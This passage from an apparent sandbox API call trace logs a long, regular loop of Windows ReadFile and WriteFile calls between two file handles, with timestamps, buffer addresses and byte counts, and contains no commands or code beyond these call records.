lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.073] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.073] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.074] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.074] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.075] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.075] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.075] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.076] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.076] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.077] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.077] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.078] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.078] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.079] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.079] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.079] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.080] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.080] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.083] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x293, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.083] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.084] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.084] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.084] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.085] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.085] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.086] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.086] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.087] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.087] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.087] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.088] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x318, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.088] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.089] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.089] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.090] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x241, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.090] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.091] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.091] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.091] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.092] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.092] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x267, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.093] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.093] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.094] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.094] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x264, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.094] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.095] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.095] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.096] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.096] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.097] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.097] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.098] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.099] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.099] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.099] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.100] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.100] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.101] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.101] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.102] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.102] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.103] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.103] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.104] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x264, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.104] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.104] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.105] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.105] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.106] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.106] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.107] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.107] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.107] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.108] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.108] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.109] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.109] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.110] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.110] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.111] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.111] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.112] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.112] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.113] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.113] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.113] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.114] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.114] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.115] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.115] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.116] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.116] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.117] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.117] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.118] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.118] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x205, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.118] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.119] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, 